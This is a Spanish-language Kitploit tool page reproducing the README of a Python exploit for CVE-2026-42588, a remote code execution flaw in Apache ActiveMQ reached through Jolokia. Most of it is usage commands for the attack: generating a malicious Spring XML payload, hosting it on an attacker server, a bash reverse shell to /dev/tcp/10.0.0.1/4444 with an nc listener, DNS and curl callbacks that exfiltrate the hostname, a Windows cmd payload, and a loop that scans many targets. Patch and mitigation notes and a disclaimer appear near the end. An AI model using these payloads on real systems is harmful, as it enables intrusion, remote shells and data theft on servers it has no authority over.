Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-42588 — Exploit RCE basado en Python para CVE-2026-42588 dirigido a Apache ActiveMQ Jolokia. Incluye modo de solo verificación, generación de XML malicioso y soporte para reverse shell, OOB y verificación basada en archivos. | Kitploit
Herramientas/GitHubGitHub/hnytgl/cve-2026-42588
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Exploit RCE basado en Python para CVE-2026-42588 dirigido a Apache ActiveMQ Jolokia. Incluye modo de solo verificación, generación de XML malicioso y soporte para reverse shell, OOB y verificación basada en archivos.

Ver Repositorio
32hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-42588 - Explotación de Vulnerabilidad de Ejecución Remota de Código en Apache ActiveMQ Jolokia

Nivel de Gravedad: 🔴 Alto (CVSS 4.0: 8.1)
Tipo de Vulnerabilidad: CWE-94 — Inyección de Código
Versiones Afectadas: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ version < 6.2.6
Requisito de Explotación: Se necesitan credenciales de autenticación de la Consola Web (por defecto admin:admin)


📋 Tabla de Contenidos

  • Resumen de la Vulnerabilidad
  • Principio de la Vulnerabilidad
  • Versiones Afectadas
  • Condiciones de Explotación
  • Descripción de Archivos
  • Inicio Rápido
  • Método de Uso Detallado
  • Panorama de la Cadena de Explotación
  • Verificar Explotación Exitosa de la Vulnerabilidad
  • Solución de Parche
  • Medidas de Mitigación Temporales
  • FAQ
  • Aviso Legal
  • Enlaces de Referencia

  • Resumen de la Vulnerabilidad

    CVE-2026-42588 es una vulnerabilidad de ejecución remota de código (RCE) posterior a la autenticación en Apache ActiveMQ.

    Bajo la condición de poseer credenciales de autenticación de la Consola Web, un atacante puede invocar el método BrokerService.addNetworkConnector(String) a través de la interfaz puente Jolokia JMX-HTTP (/api/jolokia/), proporcionando un URI de descubrimiento masterslave:// cuidadosamente construido, y utilizando el protocolo xbean: para cargar un archivo de configuración Spring XML remoto, lo que finalmente permite ejecutar comandos arbitrarios del sistema en la JVM del Broker ActiveMQ.


    Principio de la Vulnerabilidad

    Cadena de Explotación

    root@kitploit:~
    /api/jolokia/ (Jolokia JMX-HTTP Bridge)
           │
           ▼
    BrokerService.addNetworkConnector(String)
           │
           ▼
    masterslave://?brokerConfig=xbean:http://attacker/malicious.xml
           │
           ▼
    XBeanBrokerFactory → ResourceXmlApplicationContext
           │
           ▼
    Spring 预实例化所有单例 Bean → 触发 Runtime.exec() / ProcessBuilder
           │
           ▼
    🚨 远程代码执行 (RCE)
    

    Puntos Técnicos Clave

    ComponenteDescripción
    Superficie de Exposición de JolokiaLa Consola Web de ActiveMQ expone por defecto /api/jolokia/, permitiendo ejecutar la operación exec en el MBean org.apache.activemq:*
    Método PeligrosoBrokerService.addNetworkConnector(String) recibe y analiza la URI de descubrimiento
    Cadena de Disparo de URIEl parámetro brokerConfig del protocolo masterslave:// es controlable, y en combinación con el esquema xbean: desencadena la carga del contexto de Spring
    Punto de Disparo de RCEXBeanBrokerFactory utiliza ResourceXmlApplicationContext para cargar XML remoto, Spring instancia todos los Beans singleton antes de la validación de configuración

    Versiones Afectadas

    Rango de VersionesEstado
    Apache ActiveMQ < 5.19.7❌ Afectado
    6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Afectado
    Apache ActiveMQ ≥ 5.19.7✅ Parcheado
    Apache ActiveMQ ≥ 6.2.6✅ Parcheado

    Condiciones de Explotación

    1. ✅ Red Accesible — La interfaz /api/jolokia/ es accesible por el atacante (puerto predeterminado 8161)
    2. ✅ Credenciales Válidas — Poseer credenciales de autenticación de la Consola Web de ActiveMQ (por defecto admin:admin)
    3. ✅ Servicio HTTP del Atacante — Se necesita un servidor HTTP accesible por el objetivo para alojar el archivo XML malicioso

    Descripción de Archivos

    root@kitploit:~
    .
    ├── CVE-2026-42588_EXP.py   # 漏洞利用脚本(核心)
    ├── malicious.xml            # 恶意 Spring XML 模板
    ├── requirements.txt         # Python 依赖
    └── README.md                # 本文件
    
    ArchivoPropósito
    CVE-2026-42588_EXP.pyScript de explotación de vulnerabilidad en Python, admite modo de detección (--check-only) y modo de generación de XML (--gen-xml)
    malicious.xmlPlantilla de configuración Spring XML maliciosa, que incluye dos métodos de explotación: Runtime.exec() y ProcessBuilder

    Inicio Rápido

    1. Instalar Dependencias

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Generar Archivo XML Malicioso

    root@kitploit:~
    python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml
    

    3. Alojar Archivo XML Malicioso

    Iniciar el servicio HTTP en la máquina atacante:

    root@kitploit:~
    python3 -m http.server 8080
    

    4. Ejecutar la Explotación

    root@kitploit:~
    # Usar credenciales predeterminadas admin/admin
    python CVE-2026-42588_EXP.py \
        -u http://192.168.1.100:8161 \
        -x http://your-attacker-ip:8080/malicious.xml
    
    # Usar credenciales personalizadas
    python CVE-2026-42588_EXP.py \
        -u http://target:8161 \
        -U myuser \
        -P mypass \
        -x http://your-attacker-ip:8080/malicious.xml
    

    5. (Opcional) Solo Detectar Vulnerabilidad

    root@kitploit:~
    python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only
    

    Método de Uso Detallado

    Parámetros de Línea de Comandos

    root@kitploit:~
    usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                                 [-x XML_URL] [--check-only] [--gen-xml]
                                 [-c COMMAND] [--timeout TIMEOUT] [--no-verify]
    
    Opciones:
      -u, --url         URL del objetivo ActiveMQ (ej. http://192.168.1.100:8161)
      -U, --username    Nombre de usuario de la Consola Web (por defecto: admin)
      -P, --password    Contraseña de la Consola Web (por defecto: admin)
      -x, --xml-url     URL remota del archivo Spring XML malicioso
      --check-only      Solo detectar si la interfaz Jolokia es accesible
      --gen-xml         Generar archivo XML malicioso y mostrarlo en stdout
      -c, --command     Comando a ejecutar en el objetivo (por defecto: touch /tmp/activemq_pwned)
      --timeout         Tiempo de espera de solicitud HTTP en segundos (por defecto: 30)
      --no-verify       Deshabilitar verificación de certificados SSL
    

    Escenario 1: Reverse Shell

    1. Generar XML malicioso en la máquina atacante:

    root@kitploit:~
    python CVE-2026-42588_EXP.py --gen-xml \
        -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
        > reverse_shell.xml
    

    2. Alojar XML e iniciar escucha:

    root@kitploit:~
    # Terminal 1: Servicio HTTP
    python3 -m http.server 8080
    
    # Terminal 2: Escucha nc
    nc -lvnp 4444
    

    3. Disparar la vulnerabilidad:

    root@kitploit:~
    python CVE-2026-42588_EXP.py \
        -u http://target:8161 \
        -x http://10.0.0.1:8080/reverse_shell.xml
    

    Escenario 2: Ejecución de Comando CMD (objetivo Windows)

    1. Generar XML malicioso para Windows:

    Modificar el comando de ProcessBuilder en malicious.xml a:

    root@kitploit:~
    <bean class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd.exe</value>
                <value>/c</value>
                <value>whoami &gt; C:\windows\temp\pwned.txt</value>
            </list>
        </constructor-arg>
    </bean>
    

    2. Alojar y ejecutar:

    root@kitploit:~
    python CVE-2026-42588_EXP.py \
        -u http://windows-target:8161 \
        -x http://attacker:8080/malicious_win.xml
    

    Escenario 3: Solo Detección de Vulnerabilidad

    root@kitploit:~
    # Detección por lotes
    for ip in $(cat targets.txt); do
        echo "=== Probando $ip ==="
        python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
    done
    

    Panorama de la Cadena de Explotación

    root@kitploit:~
    ┌─────────────────────────────────────────────────────────────────────┐
    │                        CVE-2026-42588 攻击链                          │
    ├─────────────────────────────────────────────────────────────────────┤
    │                                                                      │
    │  ① 攻击者                             ⑤ ActiveMQ Broker (JVM)        │
    │  ┌──────────┐                         ┌──────────────────────────┐   │
    │  │ EXP脚本  │──── ② HTTP POST ───────▶│ /api/jolokia/            │   │
    │  │          │    Jolokia exec()        │                          │   │
    │  │          │    Basic Auth            │ BrokerService.           │   │
    │  │          │                          │ addNetworkConnector(     │   │
    │  │          │                          │   "masterslave://?       │   │
    │  │          │                          │    brokerConfig=         │   │
    │  │          │                          │    xbean:http://...      │   │
    │  │          │                          │    /malicious.xml"       │   │
    │  └──────────┘                          │ )                        │   │
    │       │                                └────────┬─────────────────┘   │
    │       │                                         │                     │
    │       │          ③ HTTP GET                     ▼                     │
    │       │  ┌──────────────────────┐  ┌────────────────────────────┐    │
    │       └─▶│ 攻击者 HTTP 服务器    │  │ ResourceXmlApplication     │    │
    │          │ (python http.server) │  │ Context 加载远程 XML        │    │
    │          │                      │  │                            │    │
    │          │ malicious.xml        │  │ Spring 预实例化 Bean ──▶    │    │
    │          └──────────────────────┘  │ Runtime.exec() /            │    │
    │                                    │ ProcessBuilder.start()      │    │
    │                                    │          │                  │    │
    │                                    │          ▼                  │    │
    │                                    │    🚨 RCE 成功 🚨           │    │
    │                                    └────────────────────────────┘    │
    │                                                                      │
    └─────────────────────────────────────────────────────────────────────┘
    

    Verificar Explotación Exitosa de la Vulnerabilidad

    Dado que la ejecución del comando ocurre durante la fase de análisis del Spring XML, es asíncrona, y es posible que la respuesta HTTP no muestre directamente el resultado de la ejecución. Se recomienda verificar de las siguientes maneras:

    Método 1: Reverse Shell (más confiable)

    root@kitploit:~
    # Máquina atacante
    nc -lvnp 4444
    

    Método 2: Filtración DNS (OOB)

    root@kitploit:~
    # Usar nslookup o curl en el comando para enviar datos
    nslookup $(hostname).your-dns-server.com
    

    Método 3: Detección de Archivo en el Sistema

    root@kitploit:~
    # Verificar archivo de marca en el objetivo
    ls -la /tmp/activemq_pwned
    

    Método 4: Retroconexión HTTP

    root@kitploit:~
    # En el XML malicioso usar
    curl http://your-server:8888/$(hostname)
    # Mientras tanto, en la máquina atacante escuchar
    nc -lvnp 8888
    

    Solución de Parche

    ✅ Solución Recomendada: Actualizar Versión

    Línea de VersiónActualizar a
    Serie 5.x5.19.7 o superior
    Serie 6.x6.2.6 o superior

    Dirección de descarga: https://activemq.apache.org/download

    Anuncio de parche: https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm


    Medidas de Mitigación Temporales

    Si no es posible actualizar temporalmente, se pueden tomar las siguientes medidas para reducir el riesgo:

    1. Restringir el Acceso a la Interfaz Jolokia

    En conf/jetty.xml, restringir /api/jolokia/ para que solo sea accesible desde localhost, o implementar listas blancas de IP mediante firewall/proxy inverso.

    2. Modificar la Política de Acceso de Jolokia

    Editar conf/jolokia-access.xml, prohibir la operación exec en el MBean org.apache.activemq:*:

    root@kitploit:~
    <restrict>
        <mbean>
            <name>org.apache.activemq:*</name>
            <operation>!exec</operation>
        </mbean>
    </restrict>
    

    3. Cambiar las Credenciales Predeterminadas

    Editar conf/jetty-realm.properties, cambiar el predeterminado admin: admin, admin por una contraseña fuerte.

    4. Deshabilitar la Consola Web (si no es necesaria)

    En conf/jetty.xml, comentar la configuración del Context relacionada con la Consola Web.


    FAQ

    P: ¿Esta vulnerabilidad requiere autenticación?

    R: Sí, se necesitan credenciales válidas de la Consola Web de ActiveMQ. Sin embargo, las credenciales predeterminadas son admin/admin, y en la práctica muchos sistemas no cambian la contraseña predeterminada, por lo que el riesgo sigue siendo alto.

    P: ¿Qué hacer si no hay respuesta después de ejecutar el EXP?

    R: Esto es normal. La ejecución del comando es asíncrona y ocurre durante la fase de análisis del Spring XML. Se recomienda usar reverse shell, filtración DNS, etc. para verificar. Ver Verificar Explotación Exitosa de la Vulnerabilidad.

    P: ¿Se admiten objetivos Windows?

    R: Sí. Es necesario cambiar el comando en malicious.xml de /bin/sh -c a cmd.exe /c, y ajustar la sintaxis del comando al estilo Windows.

    P: ¿El modo de detección (--check-only) puede confirmar que la vulnerabilidad existe?

    R: El modo de detección solo puede confirmar si la interfaz Jolokia es accesible (condición necesaria para la explotación). Que la interfaz sea accesible no significa que sea explotable, pero sí que existe la posibilidad.

    P: ¿Se puede explotar después del parche?

    R: No. Después de actualizar a 5.19.7+ o 6.2.6+, la lógica de análisis del parámetro brokerConfig ha sido corregida y ya no acepta el esquema xbean:.


    Aviso Legal

    ⚠️ Esta herramienta es solo para investigación de seguridad y pruebas autorizadas!

    • El acceso no autorizado a sistemas usando esta herramienta es ilegal
    • El usuario asume todas las consecuencias y responsabilidades derivadas del uso de esta herramienta
    • El autor no se hace responsable por cualquier uso no autorizado, abuso o daños resultantes
    • Utilice esta herramienta solo en sus propios sistemas o en sistemas con autorización por escrito
    • Cumpla con las leyes locales y las normas éticas profesionales

    Enlaces de Referencia

    FuenteEnlace
    Base de Datos de Vulnerabilidades (CVE Detail)https://www.cybersecurity-help.cz/vdb/vulns/133395/
    Anuncio de Vulnerabilidad de Antiyhttps://bbs.antiy.cn/thread-210844-1-1.html
    Detalle de Vulnerabilidad de DDPOChttps://ddpoc.com/DVB-2026-11290.html
    Sitio Oficial de Apache ActiveMQhttps://activemq.apache.org/
    Boletín de Seguridad de Apachehttps://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm

    CVE-2026-42588 — Solo para Fines Educativos y de Pruebas Autorizadas

    Descargar herramienta